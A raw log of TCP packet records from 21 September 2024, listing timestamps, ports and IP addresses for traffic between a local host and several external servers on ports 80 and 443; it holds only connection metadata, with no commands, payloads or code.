Sep 21, 2024 14:48:10.718152046 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.718163967 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.718170881 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.718178988 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.718195915 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.718219995 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.724525928 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.724633932 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.725248098 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.725310087 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.725583076 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.725640059 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.725645065 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.725694895 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.725720882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.725727081 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.725739002 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.725768089 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.725780964 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.725858927 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.725866079 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.725909948 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.732147932 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.732244015 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.743714094 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.743877888 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.743933916 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.743999004 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.748383045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748389959 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748403072 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748425007 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748430014 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748465061 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748491049 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748594046 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748600006 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748610973 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748615980 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748621941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748626947 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748634100 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748639107 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748642921 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748648882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748667002 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748688936 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748701096 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748709917 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748769999 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748810053 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748816013 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748826027 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748831987 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748836994 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748842955 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748858929 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748876095 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.748897076 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.748899937 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.750051975 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.753046036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.753052950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.753072977 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.753078938 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.753087997 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.753093958 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.753101110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.753143072 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.753163099 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756376028 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756392002 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756403923 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756444931 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756462097 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756468058 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756479025 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756479025 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756484985 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756515980 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756541967 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756546021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756551027 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756561995 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756567955 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756582975 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756596088 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756633997 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756658077 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756664991 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756675959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756681919 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756688118 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756694078 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756704092 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756742001 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756871939 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756877899 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756889105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756895065 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756912947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756918907 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756918907 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756925106 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756932020 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756937027 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756942987 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756947994 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756949902 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756961107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756967068 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756968975 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756972075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756978035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756980896 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.756984949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.756999016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757005930 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757009029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757014990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757025957 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757028103 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757039070 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757039070 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757046938 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757052898 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757060051 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757071018 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757077932 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757082939 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757085085 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757091045 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757097006 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757102966 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757118940 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757127047 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757133007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757138014 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757138968 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757143974 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757153988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757160902 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757177114 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757179976 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757195950 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757215977 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757225990 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757318974 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757324934 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757330894 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757335901 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757347107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757353067 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757359028 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757364035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757369995 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757369995 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757375956 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757380962 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757386923 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757391930 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757402897 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757402897 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757428885 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757461071 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757462025 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757467985 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757467985 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757473946 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757479906 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757569075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757575035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757586002 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757591009 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757606030 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757606030 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757612944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757622957 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757628918 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757633924 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757639885 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757663012 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757688999 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757705927 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757711887 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757724047 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757755041 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757762909 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757769108 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757770061 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757776022 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757827997 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757867098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757873058 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757878065 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757884026 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757901907 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757905960 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757906914 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757913113 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757917881 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757925034 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757930994 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757945061 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757951021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757956028 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.757956982 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757996082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.757996082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.761759996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.761775017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.761785984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.761856079 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.761887074 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.761893034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.761904955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.761910915 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.761919975 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.761934996 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.761950970 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.761969090 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762217999 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762224913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762236118 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762240887 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762423992 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762428999 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762429953 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762450933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762455940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762468100 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762474060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762480021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762481928 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762485981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762492895 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762497902 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762506962 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762511015 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762516975 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762522936 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762527943 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762527943 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762533903 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762538910 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762546062 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762551069 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762551069 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762557030 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762571096 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762578964 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762599945 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762623072 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762644053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762646914 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762681007 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762687922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762696028 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762700081 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762706995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762739897 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762780905 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762806892 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762813091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762825012 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762830019 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762850046 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762852907 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762857914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762880087 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762886047 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762892962 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762892962 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762900114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762919903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762919903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762963057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762969017 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.762969971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762976885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.762994051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763000011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763008118 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763015032 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763019085 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763020039 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763026953 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763037920 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763039112 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763046026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763058901 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763082027 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763092995 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763113022 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763118982 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763142109 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763151884 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763181925 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763226032 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763231993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763243914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763252974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763257980 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763267994 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763277054 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763304949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763345957 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763358116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763364077 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763370037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763375044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763400078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763406038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763411045 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763416052 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763421059 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763422012 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763441086 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763444901 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763470888 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763488054 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763504982 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763511896 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763540983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763550997 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763555050 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763561964 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763587952 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763617039 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.763622999 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763629913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763636112 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.763665915 CEST	49712	80	192.168.2.9	103.130.147.211
